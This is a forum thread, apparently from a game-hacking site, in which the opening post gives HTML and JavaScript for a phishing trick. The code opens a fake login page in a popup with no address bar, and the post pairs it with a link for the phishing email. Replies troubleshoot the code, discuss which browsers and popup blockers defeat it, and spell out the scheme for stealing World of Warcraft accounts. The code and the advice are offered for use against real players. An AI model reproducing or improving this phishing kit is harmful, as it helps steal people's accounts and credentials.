How to phish without have a credible domain name menu

Shout-Out

User Tag List

Page 1 of 2 12 LastLast
Results 1 to 15 of 28
  1. #1
    patatovor's Avatar Member
    Reputation
    6
    Join Date
    Jul 2007
    Posts
    45
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    How to phish without have a credible domain name

    -----)(Please leave the copyright text intact)(-----
    This post is copyright by the user posting it and MMOwned.com - World of Warcraft Exploits,Hacks, Bots and Guides, where it was posted. You may not copy or reproduce this information on any other site without written permission from both the poster and MMOwned.com

    Theire are a lots of threads about phishing.
    You always need a domain name who looks credible to scam accounts.
    The best way to phish with a free hoster domain name is this:

    create an html page,i call it "account.html"
    in your page put this:

    Code:
    <html>
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
    <link href="" rel="stylesheet" type="text/css">
    <SCRIPT LANGUAGE="javascript">
    window.open("your faked login page url",'fullscreen','fullscreen,scrollbars=no') 
    </script>
    </head>
    
    <body>
    <script language="javascript"> 
    var obj_window = window.open('', '_self');
    obj_window.opener = window;
    obj_window.focus();
    opener=self;
    self.close();
    </script>
    </body>
    </html>
    in your mail put this html code:
    Code:
    <a href="your account.html url">Click Here</a>
    When the target will click on the link it will open account.html,account.html will open a popup without address bar and account.html will close itself.

    Exemple:

    Click Here

    :wave:
    Last edited by patatovor; 07-14-2007 at 04:06 PM.
    Patatovor is retarded and drunk.

    How to phish without have a credible domain name
  2. #2
    mat506's Avatar Member
    Reputation
    3
    Join Date
    Mar 2007
    Posts
    45
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: How to phish without have a credible domain name

    I've been looking for something like this for a while. I'm gonna try it now, if it works, then +rep for you

    Edit: Mine still has an adress bar
    Edit: Nvm, i solved it. So, now i have the popup without the adress bar, wich is awesome. But i was just wondering: there's www.yourdomain.com/blah in the title bar of the popup, is there a way to change that too?
    Last edited by mat506; 07-13-2007 at 07:33 AM. Reason: Auto-merged Doublepost
    Insult those who disagree with you. Honestly, everyone that does not share your opinion is clearly homosexual.

  3. #3
    immortal1983's Avatar Member
    Reputation
    122
    Join Date
    Apr 2007
    Posts
    96
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: How to phish without have a credible domain name

    I'm not sure I understand the point of this.
    Why have a page that when you go to it, it just closes?
    Could elaborate a little more than just:
    When the target will click on the link it will open account.html,account.html will open a popup without address bar and it will close itself.

  4. #4
    patatovor's Avatar Member
    Reputation
    6
    Join Date
    Jul 2007
    Posts
    45
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: How to phish without have a credible domain name

    The target click on the "Click here" link,it opens a window,this window open a popup without adress bar and close itself.
    Excuse me if you don't understand,i speak a bad english.

    Originally Posted by mat506
    Edit: Nvm, i solved it. So, now i have the popup without the adress bar, wich is awesome. But i was just wondering: there's www.yourdomain.com/blah in the title bar of the popup, is there a way to change that too?
    It hapens with firefox,you can add <title>you page title</title> after the <head> balise in you faked login page but i don't think that it with solve your problem,the best solution is to hope that your targets use Internet Explorer
    Last edited by patatovor; 07-13-2007 at 02:17 PM.
    Patatovor is retarded and drunk.

  5. #5
    vulcan1909's Avatar Member
    Reputation
    1
    Join Date
    Jul 2006
    Posts
    19
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: How to phish without have a credible domain name

    how do i add it to my website, i keep pasting in your code everywhere filling in my website url and its not working, either it closes the popup after it loads, or not loading anything on the popup.

  6. #6
    patatovor's Avatar Member
    Reputation
    6
    Join Date
    Jul 2007
    Posts
    45
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: How to phish without have a credible domain name

    You're not doing it right.
    Create a page an paste the main code in it.When the target will come on this page by clicking on the link you did in your phishing mail (using
    Code:
    <a href="your page url">Click Here</a>
    ) he will be redirected on the page of your choise (of course a login page ) without any adress bar.
    Patatovor is retarded and drunk.

  7. #7
    vulcan1909's Avatar Member
    Reputation
    1
    Join Date
    Jul 2006
    Posts
    19
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: How to phish without have a credible domain name

    well it works now, but one question how come when i click your example it doenst minimized, but when you click mine it minimizes and you ahve to find it again? And will some popup blockers block it?

    Ya when i try to open the account files url on ie it doesnt come up because its being blocked, couldnt that happen on their computers?
    Last edited by vulcan1909; 07-13-2007 at 03:01 PM.

  8. #8
    patatovor's Avatar Member
    Reputation
    6
    Join Date
    Jul 2007
    Posts
    45
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: How to phish without have a credible domain name

    Originally Posted by vulcan1909
    well it works now, but one question how come when i click your example it doenst minimized, but when you click mine it minimizes and you ahve to find it again?
    I don't understand what do you mean by "and you have to find it again?".

    And will some popup blockers block it?
    Yeah,it's a simple popup so they will do.

    Ya when i try to open the account files url on ie it doesnt come up because its being blocked, couldnt that happen on their computers?
    I don't,my version works with,i can't resolve all your problems,i'm a geek,not a magician.
    Patatovor is retarded and drunk.

  9. #9
    vulcan1909's Avatar Member
    Reputation
    1
    Join Date
    Jul 2006
    Posts
    19
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: How to phish without have a credible domain name

    haha what i mean is when i click your link it just pops up and is there. On mine it pops up, minimizes and i have to find the internet browser window again. I think it would be more suspicious if it minimizes itself.

  10. #10
    patatovor's Avatar Member
    Reputation
    6
    Join Date
    Jul 2007
    Posts
    45
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: How to phish without have a credible domain name

    :squint:
    Isn't suspicious,it just come from your computer.
    Patatovor is retarded and drunk.

  11. #11
    zeryudo's Avatar Member
    Reputation
    4
    Join Date
    Jul 2006
    Posts
    14
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: How to phish without have a credible domain name

    i don't understand

  12. #12
    iPapa's Avatar Member
    Reputation
    15
    Join Date
    Jul 2007
    Posts
    74
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: How to phish without have a credible domain name

    When phishing, you should know abit about designing websites.

    I'll explain this to those who don't understand.

    1. You have a link to "WoW account login" (which is really your phishing page)
    2. Normally, your phishing page will have the address bar which will show, it isn't really the WoW account login page.
    3. What happens is, the link goes to a page, which uses javascript to open up
    another page. The javascript tells the newly opened page, to NOT DISPLAY THE ADDRESS BAR.
    4. So the final, phishing page is opened, so the Javascript now tells the page which opened the phishing page, to close.

    This is a great guide +rep

    One more thing: You could probably code this, to make it so you don't have a page which opens the phishing page, then closes. You could make it so when you click on the link, it opens your phishing page automatically with no address bar showing.

  13. #13
    immortal1983's Avatar Member
    Reputation
    122
    Join Date
    Apr 2007
    Posts
    96
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: How to phish without have a credible domain name

    You will never be able to get rid of the address bar in any browser for it is a security feature.
    Firefox: Will leave url in front of the page's title
    IE: Will still have an address bar but disabled
    Opera: Same as Firefox
    etc...

    There is no way around... sorry

  14. #14
    patatovor's Avatar Member
    Reputation
    6
    Join Date
    Jul 2007
    Posts
    45
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: How to phish without have a credible domain name

    I know,i use Opera.
    But the most of people use IE6,it's working fine with.
    Patatovor is retarded and drunk.

  15. #15
    immortal1983's Avatar Member
    Reputation
    122
    Join Date
    Apr 2007
    Posts
    96
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Re: How to phish without have a credible domain name

    IE6? IE7 is the common now in days... since microsoft loves to shove updates up your ass hahaha... but yes I can confirm that IE6 is not as secure as IE7... so you could possibly catch a break with some people.


Page 1 of 2 12 LastLast

Similar Threads

  1. How to get Opcodes without having to sniff Blizzards servers?
    By MrTravisL in forum WoW Memory Editing
    Replies: 10
    Last Post: 01-08-2011, 10:18 PM
  2. How to get the core hound pup without having an cellphone or buying one
    By shaman666 in forum World of Warcraft Guides
    Replies: 97
    Last Post: 05-24-2010, 10:13 AM
  3. Replies: 4
    Last Post: 10-04-2008, 11:23 AM
  4. Mount in AQ without having a bugged mount
    By Matt in forum World of Warcraft Exploits
    Replies: 1
    Last Post: 03-27-2006, 06:01 PM
All times are GMT -5. The time now is 01:48 AM. Powered by vBulletin® Version 4.2.3
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2024 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search